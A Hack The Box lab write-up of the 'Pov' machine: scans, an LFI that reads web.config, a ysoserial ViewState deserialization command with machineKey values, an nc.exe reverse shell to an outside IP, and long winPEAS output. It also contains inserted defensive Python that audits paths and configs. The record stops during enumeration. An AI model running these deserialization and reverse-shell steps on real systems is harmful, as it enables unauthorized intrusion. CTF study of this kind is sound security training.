
【Hack The Box】Pov【WriteUp】

Posted at 2024-06-08

Introduction

Hello, this is your resident hopeless wannabe engineer.
This article is a write-up of my attempt at "Pov" on Hack The Box (see the link below).
Note: unlike earlier posts, this one does not go into details such as how each tool is used.

Note: do not misuse this. Use these techniques only to contribute to society; otherwise you will be breaking the law.

Initial Reconnaissance

Port Scan

┌──(root㉿kali)-[~/work]
└─# rustscan -a 10.10.11.251 --top --ulimit 5000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.251:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 02:45 EST
Initiating Ping Scan at 02:45
Scanning 10.10.11.251 [4 ports]
Completed Ping Scan at 02:45, 0.29s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:45
Completed Parallel DNS resolution of 1 host. at 02:45, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 02:45
Scanning 10.10.11.251 [1 port]
Discovered open port 80/tcp on 10.10.11.251
Completed SYN Stealth Scan at 02:45, 0.24s elapsed (1 total ports)
Nmap scan report for 10.10.11.251
Host is up, received echo-reply ttl 127 (0.22s latency).
Scanned at 2024-03-02 02:45:39 EST for 0s

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds
           Raw packets sent: 5 (196B) | Rcvd: 2 (72B)

It is unusual for a Windows box to have only port 80 open.
Just in case, I enumerate UDP ports as well.

┌──(root㉿kali)-[~/work]
└─# nmap -sU -n -Pn -v 10.10.11.251
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 02:44 EST
Initiating UDP Scan at 02:44
Scanning 10.10.11.251 [1000 ports]
UDP Scan Timing: About 15.50% done; ETC: 02:48 (0:02:49 remaining)
UDP Scan Timing: About 30.50% done; ETC: 02:48 (0:02:19 remaining)
UDP Scan Timing: About 45.50% done; ETC: 02:48 (0:01:49 remaining)
UDP Scan Timing: About 60.05% done; ETC: 02:48 (0:01:20 remaining)
UDP Scan Timing: About 74.55% done; ETC: 02:48 (0:00:52 remaining)
Completed UDP Scan at 02:48, 201.66s elapsed (1000 total ports)
Nmap scan report for 10.10.11.251
Host is up.
All 1000 scanned ports on 10.10.11.251 are in ignored states.
Not shown: 1000 open|filtered udp ports (no-response)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 201.75 seconds
           Raw packets sent: 2088 (98.552KB) | Rcvd: 1 (28B)

Nothing there, it seems.
Well, port 80 is the only way in. Feels like the real world, which should be fun.

Web Enumeration

Browsing

Let's actually visit the site.
1.png
An ASP.NET site appears. The domain pov.htb is visible, so I add it to /etc/hosts.

┌──(root💀kali)-[~/work]
└─# vim /etc/hosts   
10.10.11.251    pov.htb

Subdomain Enumeration

Enumerate subdomains with ffuf.

┌──(root㉿kali)-[~/work]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -u http://pov.htb/ -H "HOST: FUZZ.pov.htb" -fs 12330 -t 150 -mc all

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://pov.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.pov.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 150
 :: Matcher          : Response status: all
 :: Filter           : Response size: 12330
________________________________________________

dev                     [Status: 302, Size: 152, Words: 9, Lines: 2, Duration: 890ms]
xinaomenbaijiale        [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5373ms]
xinli                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 5392ms]
*                       [Status: 400, Size: 334, Words: 21, Lines: 7, Duration: 214ms]
:: Progress: [100000/100000] :: Job [1/1] :: 493 req/sec :: Duration: [0:03:07] :: Errors: 0 ::

Several results came back. Of these, only dev actually worked as a subdomain.
Add this one to /etc/hosts as well.

10.10.11.251    pov.htb dev.pov.htb

The site itself looks like this.
2.png

Directory Enumeration

Enumerate with dirsearch.

┌──(root㉿kali)-[~/work]
└─# dirsearch -u http://dev.pov.htb/portfolio/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/work/reports/http_dev.pov.htb/_portfolio__24-03-02_03-16-49.txt

Target: http://dev.pov.htb/

[03:16:49] Starting: portfolio/
[03:16:53] 302 -  162B  - /portfolio/%2e%2e//google.com  ->  http://dev.pov.htb/portfolio/google.com
[03:16:53] 302 -  158B  - /portfolio/%3f/  ->  /default.aspx?aspxerrorpath=/portfolio/?/
[03:16:53] 403 -  312B  - /portfolio/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[03:16:53] 302 -  161B  - /portfolio/.asmx  ->  /default.aspx?aspxerrorpath=/portfolio/.asmx
[03:16:53] 302 -  161B  - /portfolio/.ashx  ->  /default.aspx?aspxerrorpath=/portfolio/.ashx
[03:17:08] 403 -  312B  - /portfolio/\..\..\..\..\..\..\..\..\..\etc\passwd
[03:17:13] 302 -  165B  - /portfolio/admin%20/  ->  /default.aspx?aspxerrorpath=/portfolio/admin%20/
[03:17:14] 302 -  162B  - /portfolio/admin.  ->  /default.aspx?aspxerrorpath=/portfolio/admin.
[03:17:30] 301 -  159B  - /portfolio/assets  ->  http://dev.pov.htb/portfolio/assets/
[03:17:30] 302 -  156B  - /portfolio/assets/  ->  http://dev.pov.htb:8080/portfolio
[03:17:30] 302 -  163B  - /portfolio/asset..  ->  /default.aspx?aspxerrorpath=/portfolio/asset..
[03:17:38] 403 -  312B  - /portfolio/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[03:17:43] 200 -    5KB - /portfolio/contact.aspx
[03:17:48] 302 -  235B  - /portfolio/docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console  ->  /default.aspx?aspxerrorpath=/portfolio/docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
[03:17:59] 302 -  166B  - /portfolio/index.php.  ->  /default.aspx?aspxerrorpath=/portfolio/index.php.
[03:18:01] 302 -  180B  - /portfolio/javax.faces.resource.../  ->  /default.aspx?aspxerrorpath=/portfolio/javax.faces.resource.../
[03:18:01] 302 -  272B  - /portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd  ->  /default.aspx?aspxerrorpath=/portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[03:18:01] 302 -  239B  - /portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*  ->  /default.aspx?aspxerrorpath=/portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[03:18:01] 302 -  267B  - /portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo  ->  /default.aspx?aspxerrorpath=/portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[03:18:01] 302 -  265B  - /portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd  ->  /default.aspx?aspxerrorpath=/portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[03:18:01] 302 -  264B  - /portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned  ->  /default.aspx?aspxerrorpath=/portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[03:18:01] 302 -  246B  - /portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable  ->  /default.aspx?aspxerrorpath=/portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[03:18:01] 302 -  249B  - /portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties  ->  /default.aspx?aspxerrorpath=/portfolio/jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[03:18:01] 302 -  213B  - /portfolio/jolokia/exec/java.lang:type=Memory/gc  ->  /default.aspx?aspxerrorpath=/portfolio/jolokia/exec/java.lang:type=Memory/gc
[03:18:01] 302 -  233B  - /portfolio/jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used  ->  /default.aspx?aspxerrorpath=/portfolio/jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[03:18:01] 302 -  221B  - /portfolio/jolokia/read/java.lang:type=*/HeapMemoryUsage  ->  /default.aspx?aspxerrorpath=/portfolio/jolokia/read/java.lang:type=*/HeapMemoryUsage
[03:18:01] 302 -  214B  - /portfolio/jolokia/search/*:j2eeType=J2EEServer,*  ->  /default.aspx?aspxerrorpath=/portfolio/jolokia/search/*:j2eeType=J2EEServer,*
[03:18:01] 302 -  226B  - /portfolio/jolokia/write/java.lang:type=Memory/Verbose/true  ->  /default.aspx?aspxerrorpath=/portfolio/jolokia/write/java.lang:type=Memory/Verbose/true
[03:18:04] 302 -  166B  - /portfolio/login.wdm%2e  ->  /default.aspx?aspxerrorpath=/portfolio/login.wdm.
[03:18:21] 302 -  168B  - /portfolio/rating_over.  ->  /default.aspx?aspxerrorpath=/portfolio/rating_over.
[03:18:25] 302 -  168B  - /portfolio/service.asmx  ->  /default.aspx?aspxerrorpath=/portfolio/service.asmx
[03:18:30] 302 -  164B  - /portfolio/static..  ->  /default.aspx?aspxerrorpath=/portfolio/static..
[03:18:35] 302 -  165B  - /portfolio/Trace.axd  ->  /default.aspx?aspxerrorpath=/portfolio/Trace.axd
[03:18:36] 302 -  195B  - /portfolio/umbraco/webservices/codeEditorSave.asmx  ->  /default.aspx?aspxerrorpath=/portfolio/umbraco/webservices/codeEditorSave.asmx
[03:18:42] 302 -  165B  - /portfolio/WEB-INF./  ->  /default.aspx?aspxerrorpath=/portfolio/WEB-INF./
[03:18:44] 302 -  171B  - /portfolio/WebResource.axd?d=LER8t9aS  ->  /default.aspx?aspxerrorpath=/portfolio/WebResource.axd

Task Completed

The only thing of interest is probably /portfolio/contact.aspx.
Let's also look at the endpoints with katana.

┌──(root㉿kali)-[~/work]
└─# katana -u http://dev.pov.htb/portfolio/

   __        __                
  / /_____ _/ /____ ____  ___ _
 /  '_/ _  / __/ _  / _ \/ _  /
/_/\_\\_,_/\__/\_,_/_//_/\_,_/							 

		projectdiscovery.io

[INF] Current katana version v1.0.5 (latest)
[INF] Started standard crawling for => http://dev.pov.htb/portfolio/
http://dev.pov.htb/portfolio/
http://dev.pov.htb/portfolio/assets/vendors/bootstrap/bootstrap.affix.js
http://dev.pov.htb/portfolio/assets/js/steller.js
http://dev.pov.htb/portfolio/assets/vendors/bootstrap/bootstrap.bundle.js
http://dev.pov.htb/portfolio/assets/vendors/themify-icons/css/themify-icons.css
http://dev.pov.htb/portfolio/contact.aspx
http://dev.pov.htb/portfolio/assets/css/steller.css
http://dev.pov.htb/portfolio/assets/vendors/jquery/jquery-3.4.1.js
http://dev.pov.htb/portfolio/default.aspx
http://dev.pov.htb:8080

So there is a default.aspx. Port 8080 is probably an internal port that is being forwarded.
default.aspx has a button to download cv.pdf, so I click it.
3.png
The PDF downloaded. Nothing particularly new in its contents.
Check it with exiftool.

┌──(root㉿kali)-[/home/kali/Downloads]
└─# exiftool cv.pdf 
ExifTool Version Number         : 12.76
File Name                       : cv.pdf
Directory                       : .
File Size                       : 148 kB
File Modification Date/Time     : 2024:03:02 03:29:10-05:00
File Access Date/Time           : 2024:03:02 03:29:11-05:00
File Inode Change Date/Time     : 2024:03:02 03:29:10-05:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.7
Linearized                      : No
Page Count                      : 1
Language                        : es
Tagged PDF                      : Yes
XMP Toolkit                     : 3.1-701
Producer                        : Microsoft® Word para Microsoft 365
Creator                         : Turbo
Creator Tool                    : Microsoft® Word para Microsoft 365
Create Date                     : 2023:09:15 12:47:15-06:00
Modify Date                     : 2023:09:15 12:47:15-06:00
Document ID                     : uuid:3046DD6C-A619-4073-9589-BE6776F405F2
Instance ID                     : uuid:3046DD6C-A619-4073-9589-BE6776F405F2
Author                          : Turbo

Nothing useful here.

Initial Access

LFI

The POST request that fetches the PDF looks like this. I turn on intercept and capture it.
4.png
I test whether this file parameter is vulnerable to LFI, but neither ..\..\..\..\boot.ini nor ../../boot.ini went through.
5.png
For now, I enumerate files likely to sit in the same directory with Burp Intruder.
Feed the file list into Burp as a Simple list.
6.png
7.png
Enumerating, I find one whose response size is clearly different.
8.png
default.aspx came back. The code and the PDF it serves appear to live in the same directory.
So we can assume web.config is one level up. You can confirm this by looking up the ASP.NET directory structure.
Enter ..\web.config.
9.png
Confirmed.
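
As an added example (not part of the original write-up), the download handler's path handling is modelled in Python below: a naive join of the kind the file parameter suggests, next to a hardened resolver that only accepts a bare file name and then verifies that the normalised path still lies inside the files directory. The directory name is a constructed assumption, and ntpath is used so the Windows/IIS treatment of both separators is reproduced on any OS.

```python
import ntpath

# Constructed sample location for the downloadable files; not the box's real path.
FILES_DIR = r"C:\inetpub\wwwroot\portfolio\files"


def vulnerable_resolve(base_dir: str, requested: str) -> str:
    """Naive join, modelled on how the download handler behaved in the
    write-up: the requested name is appended to the directory, so ".."
    segments (with either separator) walk out of it."""
    return ntpath.normpath(ntpath.join(base_dir, requested))


def safe_resolve(base_dir: str, requested: str):
    """Hardened resolver. Returns the full path only when `requested` is a
    bare file name that, after normalisation, still lies inside base_dir;
    returns None for anything else (traversal, absolute paths, drives, UNC)."""
    if not requested or "\x00" in requested or requested in (".", ".."):
        return None
    # A download parameter should only ever be a bare file name:
    # no directory separators of either kind and no drive prefix.
    if ntpath.basename(requested) != requested or ntpath.splitdrive(requested)[0]:
        return None
    base = ntpath.normpath(base_dir)
    full = ntpath.normpath(ntpath.join(base, requested))
    # Defence in depth: confirm the normalised result is still under base.
    try:
        common = ntpath.commonpath([base, full])
    except ValueError:  # different drive or UNC share
        return None
    if ntpath.normcase(common) != ntpath.normcase(base):
        return None
    return full


if __name__ == "__main__":
    for name in ("cv.pdf", r"..\web.config", "../../web.config", r"C:\Windows\win.ini"):
        print(f"{name!r:24} naive -> {vulnerable_resolve(FILES_DIR, name)}")
        print(f"{'':24} safe  -> {safe_resolve(FILES_DIR, name)}")
```

The bare-name rule is what actually closes the hole; the commonpath check is there so that a later relaxation of the first rule (allowing subdirectories, say) still cannot reach web.config one level up.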

RCE

ASP.NET 4.5

Looking at the retrieved web.config, the framework version can be seen in the following line.

<httpRuntime targetFramework="4.5" />

While researching this, I found the following article.

Following that article, I build the payload on a Windows machine.
To build it you need to get ysoserial.exe from the repository below and run it.
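
The dangerous combination here is a disclosed machineKey on a runtime version that still honours enableViewStateMac. As an added example that is not from the article or the linked repository, the following Python script audits a web.config for that combination and prints what a defender should change; the sample configs and their key values are constructed placeholders, not the box's own.

```python
import xml.etree.ElementTree as ET

# Constructed web.config in the shape of the one retrieved via the LFI.
# Key values are placeholders, not the box's real machineKey.
SAMPLE_WEB_CONFIG = """<configuration>
  <system.web>
    <httpRuntime targetFramework="4.5" />
    <machineKey validationKey="PLACEHOLDER_VALIDATION_KEY_HEX"
                decryptionKey="PLACEHOLDER_DECRYPTION_KEY_HEX"
                validation="SHA1" decryption="AES" />
    <pages enableViewStateMac="false" />
  </system.web>
</configuration>
"""

# The same file with the settings a defender would want instead (constructed).
HARDENED_WEB_CONFIG = """<configuration>
  <system.web>
    <httpRuntime targetFramework="4.8" />
    <machineKey validationKey="AutoGenerate,IsolateApps"
                decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" decryption="AES" />
    <pages enableViewStateMac="true" viewStateEncryptionMode="Always" />
  </system.web>
</configuration>
"""

LEGACY_ALGOS = {"MD5", "SHA1", "3DES", "DES"}


def parse_version(text):
    """'4.5' -> (4, 5); non-numeric parts are ignored."""
    return tuple(int(p) for p in text.strip().split(".") if p.isdigit())


def audit_web_config(xml_text):
    """Return [(finding_id, detail), ...] for ViewState-related weaknesses."""
    root = ET.fromstring(xml_text)
    findings = []

    for mk in root.iter("machineKey"):
        static = [a for a in ("validationKey", "decryptionKey")
                  if mk.get(a) and not mk.get(a).startswith("AutoGenerate")]
        if static:
            findings.append(("STATIC_MACHINE_KEY",
                             "explicit " + ", ".join(static) +
                             ": anyone who can read this file can sign ViewState; "
                             "rotate the keys if the file was ever disclosed"))
        weak = [f"{a}={mk.get(a)}" for a in ("validation", "decryption")
                if mk.get(a, "").upper() in LEGACY_ALGOS]
        if weak:
            findings.append(("LEGACY_CRYPTO",
                             "; ".join(weak) + " (prefer HMACSHA256 and AES)"))

    for pages in root.iter("pages"):
        if pages.get("enableViewStateMac", "true").lower() == "false":
            findings.append(("VIEWSTATE_MAC_DISABLED", 'pages enableViewStateMac="false"'))

    for rt in root.iter("httpRuntime"):
        tf = rt.get("targetFramework")
        if tf and parse_version(tf) < (4, 5, 2):
            findings.append(("OLD_TARGET_FRAMEWORK",
                             f"targetFramework={tf}: before 4.5.2 the runtime still "
                             'honours enableViewStateMac="false"'))
    return findings


if __name__ == "__main__":
    for label, cfg in (("sample", SAMPLE_WEB_CONFIG), ("hardened", HARDENED_WEB_CONFIG)):
        print(f"== {label} ==")
        for fid, detail in audit_web_config(cfg) or [("OK", "no findings")]:
            print(f"  {fid}: {detail}")
```

Two caveats for anyone applying this: a static machineKey is not a finding by itself (a web farm needs one), the finding is that the copy the attacker already holds keeps working until the keys are rotated; and IIS normally refuses to serve web.config, so the real root cause on this box is the file read in the previous section, which the config audit cannot see.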

reverse shell

First, create the reverse shell to fire. The usual revshells.

10.png

Serialize it with ysoserial.exe.

.\ysoserial.exe -p ViewState -g TextFormattingRunProperties --path="/portfolio/default.aspx" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" -c "コマンド"

11.png
Send this serialized payload in __VIEWSTATE.
12.png
13.png
Got a reverse shell! But this alone does not get us the user flag.
With this PowerShell reverse shell the winPEAS output cannot be seen in real time, so I upgrade the shell.
Upload nc.exe to the box, run it, and catch a shell again.

PS C:\Users\sfitz\Desktop> .\nc.exe 10.10.14.83 1234 -e cmd

14.png
Got a stable shell.

Credential Access

First, let's look around for any information.

winPEAS

Run our smiling friend.

PS C:\Users\sfitz\Desktop> .\winPEASany.exe 
.\winPEASany.exe
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
     
               ((((((((((((((((((((((((((((((((
        (((((((((((((((((((((((((((((((((((((((((((
      ((((((((((((((**********/##########(((((((((((((   
    ((((((((((((********************/#######(((((((((((
    ((((((((******************/@@@@@/****######((((((((((
    ((((((********************@@@@@@@@@@/***,####((((((((((
    (((((********************/@@@@@%@@@@/********##(((((((((
    (((############*********/%@@@@@@@@@/************((((((((
    ((##################(/******/@@@@@/***************((((((
    ((#########################(/**********************(((((
    ((##############################(/*****************(((((
    ((###################################(/************(((((
    ((#######################################(*********(((((
    ((#######(,.***.,(###################(..***.*******(((((
    ((#######*(#####((##################((######/(*****(((((
    ((###################(/***********(##############()(((((
    (((#####################/*******(################)((((((
    ((((############################################)((((((
    (((((##########################################)(((((((
    ((((((########################################)(((((((
    ((((((((####################################)((((((((
    (((((((((#################################)(((((((((
        ((((((((((##########################)(((((((((
              ((((((((((((((((((((((((((((((((((((((
                 ((((((((((((((((((((((((((((((

ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own devices and/or with the device owner's permission.'

  WinPEAS-ng by @hacktricks_live

       /---------------------------------------------------------------------------------\
       |                             Do you like PEASS?                                  |
       |---------------------------------------------------------------------------------| 
       |         Get the latest version    :     https://github.com/sponsors/carlospolop |
       |         Follow on Twitter         :     @hacktricks_live                        |
       |         Respect on HTB            :     SirBroccoli                             |
       |---------------------------------------------------------------------------------|
       |                                 Thank you!                                      |
       \---------------------------------------------------------------------------------/

  [+] Legend:
         Red                Indicates a special privilege over an object or something is misconfigured
         Green              Indicates that some protection is enabled or something is well configured
         Cyan               Indicates active users
         Blue               Indicates disabled users
         LightYellow        Indicates links

 You can find a Windows local PE Checklist here: https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation
   Creating Dynamic lists, this could take a while, please wait...
   - Loading sensitive_files yaml definitions file...
   - Loading regexes yaml definitions file...
   - Checking if domain...
   - Getting Win32_UserAccount info...
   - Creating current user groups list...
   - Creating active users list (local only)...
   - Creating disabled users list...
   - Admin users list...
   - Creating AppLocker bypass list...
   - Creating files/directories list for search...


                                   ͹ System Information                                      

          ͹ Basic System Information
  Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
    OS Name: Microsoft Windows Server 2019 Standard
    OS Version: 10.0.17763 N/A Build 17763
    System Type: x64-based PC
    Hostname: pov
    ProductName: Windows Server 2019 Standard
    EditionID: ServerStandard
    ReleaseId: 1809
    BuildBranch: rs5_release
    CurrentMajorVersionNumber: 10
    CurrentVersion: 6.3
    Architecture: AMD64
    ProcessorCount: 2
    SystemLang: en-US
    KeyboardLang: English (United States)
    TimeZone: (UTC-08:00) Pacific Time (US & Canada)
    IsVirtualMachine: True
    Current Time: 3/2/2024 2:50:28 AM
    HighIntegrity: False
    PartOfDomain: False
    Hotfixes: 

... (omitted)

͹ Users
  Check if you have some admin equivalent privileges https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#users-and-groups
  Current user: sfitz
  Current groups: Domain Users, Everyone, Users, Batch, Console Logon, Authenticated Users, This Organization, Local account, IIS_IUSRS, Local, dev, NTLM Authentication
   =================================================================================================

    POV\Administrator: Built-in account for administering the computer/domain
        |->Groups: Administrators
        |->Password: CanChange-NotExpi-Req

    POV\alaading
        |->Groups: Remote Management Users,Users
        |->Password: CanChange-NotExpi-Req

    POV\DefaultAccount(Disabled): A user account managed by the system.
        |->Groups: System Managed Accounts Group
        |->Password: CanChange-NotExpi-NotReq

    POV\Guest(Disabled): Built-in account for guest access to the computer/domain
        |->Groups: Guests
        |->Password: NotChange-NotExpi-NotReq

    POV\sfitz
        |->Groups: Users
        |->Password: CanChange-NotExpi-Req

    POV\WDAGUtilityAccount(Disabled): A user account managed and used by the system for Windows Defender Application Guard scenarios.
        |->Password: CanChange-Expi-Req

... (omitted)

          ͹ Network Ifaces and known hosts
  The masks are only for the IPv4 addresses 
    Ethernet0 2[00:50:56:B9:C1:9C]: 10.10.11.251, fe80::f335:1023:8d00:b74a%4 / 255.255.254.0
        Gateways: 10.10.10.2
        DNSs: 127.0.0.1
        Known hosts:
          10.10.10.2            00-50-56-B9-A8-B4     Dynamic
          10.10.11.255          FF-FF-FF-FF-FF-FF     Static
          169.254.255.255       00-00-00-00-00-00     Invalid
          224.0.0.22            01-00-5E-00-00-16     Static
          224.0.0.251           01-00-5E-00-00-FB     Static
          224.0.0.252           01-00-5E-00-00-FC     Static

    Loopback Pseudo-Interface 1[]: 127.0.0.1, ::1 / 255.0.0.0
        DNSs: fec0:0:0:ffff::1%1, fec0:0:0:ffff::2%1, fec0:0:0:ffff::3%1
        Known hosts:
          224.0.0.22            00-00-00-00-00-00     Static


          ͹ Current TCP Listening Ports
  Check for services restricted from the outside 
  Enumerating IPv4 connections

  Protocol   Local Address         Local Port    Remote Address        Remote Port     State             Process ID      Process Name

  TCP        0.0.0.0               80            0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               135           0.0.0.0               0               Listening         852             svchost
  TCP        0.0.0.0               445           0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               5985          0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               47001         0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               49664         0.0.0.0               0               Listening         480             wininit
  TCP        0.0.0.0               49665         0.0.0.0               0               Listening         924             svchost
  TCP        0.0.0.0               49666         0.0.0.0               0               Listening         1204            svchost
  TCP        0.0.0.0               49667         0.0.0.0               0               Listening         620             services
  TCP        0.0.0.0               49668         0.0.0.0               0               Listening         628             lsass

There is a user alaading, so I expect to move laterally to that account. Also, there is nothing special among the internal ports and no LDAP, so this is presumably not an AD environment.
So I figured it is a simple enumeration case and went through the PEAS output, but found nothing.

Powerless

For simple enumeration, Powerless is useful. Run it.

PS C:\Users\sfitz\Desktop> .\Powerless.bat
.\Powerless.bat
------ System Info (Use full output in conjunction with windows-exploit-suggester.py)-------

Host Name:                 POV
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00429-00521-62775-AA076
Original Install Date:     10/26/2023, 1:01:55 PM
System Boot Time:          2/29/2024, 9:02:13 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 3,138 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,670 MB
Virtual Memory: In Use:    1,129 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.11.251
                                 [02]: fe80::f335:1023:8d00:b74a
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

----- Architecture -------
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_ARCHITEW6432=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=5507

------ Users and groups (check individual user with 'net user USERNAME' ) Check user privileges for SeImpersonate (rotten potato exploit) -------
Current User: POV$ 

USER INFORMATION
----------------

User Name SID                                          
========= =============================================
pov\sfitz S-1-5-21-2506154456-4081221362-271687478-1000


... (omitted)

C:\Users\sfitz\3D Objects\desktop.ini
C:\Users\sfitz\Contacts\desktop.ini
C:\Users\sfitz\Desktop\accesschk64.exe
C:\Users\sfitz\Desktop\desktop.ini
C:\Users\sfitz\Desktop\Microsoft
C:\Users\sfitz\Desktop\nc.exe
C:\Users\sfitz\Desktop\Powerless.bat
C:\Users\sfitz\Desktop\winPEAS.bat
C:\Users\sfitz\Desktop\winPEASany.exe
C:\Users\sfitz\Documents\connection.xml
C:\Users\sfitz\Documents\desktop.ini
C:\Users\sfitz\Documents\My Music
C:\Users\sfitz\Documents\My Pictures
C:\Users\sfitz\Documents\My Videos
C:\Users\sfitz\Downloads\desktop.ini
C:\Users\sfitz\Links\desktop.ini
C:\Users\sfitz\Links\Desktop.lnk
C:\Users\sfitz\Links\Downloads.lnk
C:\Users\sfitz\Music\desktop.ini
C:\Users\sfitz\Pictures\desktop.ini
C:\Users\sfitz\Saved Games\desktop.ini
C:\Users\sfitz\Searches\desktop.ini
C:\Users\sfitz\Searches\Everywhere.search-ms
C:\Users\sfitz\Searches\Indexed Locations.search-ms
